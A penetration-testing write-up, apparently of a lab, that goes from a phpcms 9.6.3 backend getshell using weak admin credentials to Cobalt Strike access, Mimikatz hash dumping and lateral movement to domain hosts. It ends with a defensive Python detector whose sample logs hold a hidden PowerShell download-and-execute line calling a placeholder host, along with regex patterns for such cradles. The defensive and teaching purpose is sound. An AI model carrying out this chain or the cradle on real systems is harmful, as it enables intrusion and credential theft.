Notes on exploiting a phpcms 9.6.3 vulnerability: from getshell to the internal domain controller
2022-06-26 12:35:00 [『铁躯电芯』]
Information gathering
First, use nmap to sweep the subnet and collect the live host IP addresses:
nmap -sP 192.168.31.0/24

Scan the host details:

The host appears to be running Windows 7 with port 80 open.
getshell
Since port 80 is open, browse to the site directly:
Result:

Directory scanning reveals the administrator login page:

Result:

Weak credentials: admin / admin12345
There are many write-ups of the phpcms 9.6.3 backend getshell vulnerability online; this blog post is a good reference:
https://blog.csdn.net/weixin_42433470/article/details/112409431
The path I used is:
Users -> Admin module -> Add member model

Shell obtained:

Gaining access
Connect to the shell with AntSword

Then bring the host online in Cobalt Strike (CS):
First create a listener:

The attack module used is:
Attacks -> Web Drive-by -> Scripted Web Delivery

Generate the payload:

Copy it into AntSword and run it:

The beacon checks in on the CS side:

Reconnaissance from CS
shell systeminfo

Result:

Collected: the domain is god.org
Another address is present: 192.168.52.143
Privilege escalation

SYSTEM privileges obtained:
Dump hashes with CS
Access -> Run Mimikatz


View the domain environment from CS:
net view

Get the list of domain hosts from CS:

Access the domain host win2008 from CS

Initial result:

Run the command:

Access the domain host Windows Server 2003 from CS

Initial result:

Command output:
shell ipconfig    view the IP address
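The chain described above leaves a distinctive trail on the web server: a PHP worker spawning cmd.exe for the AntSword webshell, a PowerShell download cradle when the Scripted Web Delivery one-liner runs, and then discovery commands (systeminfo, net view, ipconfig) issued through the beacon. The following is an added detection example written for this page, not code from the original post; it runs a few stacked rules over constructed process-creation log lines in a generic key=value format (hostnames, users and the 198.51.100.10 address are placeholders) and reports which stage each suspicious event corresponds to.

```python
import re

# Constructed sample process-creation events (not from the original post); the
# format is a generic key=value line such as an EDR or Sysmon forwarder might
# emit. Hostnames, users and the 198.51.100.10 address are placeholders.
SAMPLE_LOGS = [
    "2022-06-26 12:40:01 host=WEB01 user=\"IIS APPPOOL\\DefaultAppPool\" "
    "parent=php-cgi.exe image=cmd.exe cmdline=\"cmd.exe /c whoami\"",
    "2022-06-26 12:41:10 host=WEB01 user=\"IIS APPPOOL\\DefaultAppPool\" "
    "parent=cmd.exe image=powershell.exe cmdline=\"powershell.exe -nop -w hidden "
    "-c IEX ((new-object net.webclient).downloadstring('http://198.51.100.10/a'))\"",
    "2022-06-26 12:45:00 host=WEB01 user=SYSTEM parent=services.exe "
    "image=svchost.exe cmdline=\"svchost.exe -k netsvcs\"",
    "2022-06-26 12:46:00 host=ADMIN-PC user=\"god\\alice\" parent=explorer.exe "
    "image=powershell.exe cmdline=\"powershell.exe -File C:\\scripts\\backup.ps1\"",
    "2022-06-26 12:50:12 host=WEB01 user=SYSTEM parent=powershell.exe "
    "image=cmd.exe cmdline=\"cmd.exe /c net view\"",
]

# key=value pairs; values are either a double-quoted string (backslash escapes
# allowed) or a run of non-whitespace characters.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# Web server worker processes that should never spawn an interactive shell.
WEB_SERVER_PARENTS = {"php-cgi.exe", "php.exe", "w3wp.exe", "httpd.exe", "nginx.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Download-and-execute cradle primitives.
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b)", re.I)
# Flags typically combined with a cradle to hide the window or skip profiles/policy.
EVASION_RE = re.compile(
    r"(-nop\b|-noprofile|-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|"
    r"-ep\s+bypass|-exec(utionpolicy)?\s+bypass)", re.I)
# Host and domain discovery commands seen in the write-up.
DISCOVERY_RE = re.compile(
    r"\b(systeminfo|whoami|ipconfig|net\s+(view|user|group|localgroup)|nltest)\b", re.I)


def parse_line(line):
    """Split one log line into a dict of fields, keeping the leading timestamp."""
    fields = {"timestamp": line[:19]}
    for key, value in KV_RE.findall(line[20:]):
        if value.startswith('"'):
            value = value[1:-1].replace('\\"', '"')
        fields[key] = value
    return fields


def analyse(event):
    """Return the list of rule names that fire for one parsed event."""
    reasons = []
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    cmd = event.get("cmdline", "")
    if parent in WEB_SERVER_PARENTS and image in SHELL_IMAGES:
        reasons.append("web server process spawned a shell (webshell indicator)")
    if image in POWERSHELL_IMAGES:
        if CRADLE_RE.search(cmd):
            reasons.append("PowerShell download/execute cradle")
        if EVASION_RE.search(cmd):
            reasons.append("PowerShell launched with hidden/no-profile/encoded flags")
    if image in SHELL_IMAGES and DISCOVERY_RE.search(cmd):
        reasons.append("host/domain discovery command")
    return reasons


def detect(lines):
    """Run every rule over each line and collect the events that triggered."""
    alerts = []
    for line in lines:
        event = parse_line(line)
        reasons = analyse(event)
        if reasons:
            alerts.append({
                "timestamp": event["timestamp"],
                "host": event.get("host"),
                "image": event.get("image"),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOGS):
        print(alert["timestamp"], alert["host"], alert["image"])
        for reason in alert["reasons"]:
            print("   -", reason)
```

The rules are deliberately layered by stage: the web-server-to-shell rule fires at the very first command the webshell runs, before any beacon exists, so it is the one to alert on loudest; the cradle and flag rules catch the Scripted Web Delivery one-liner even if the parent chain is broken; the discovery rule is noisier on its own and is best used to confirm an earlier hit on the same host. Adjust WEB_SERVER_PARENTS to the actual worker process of your web stack.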
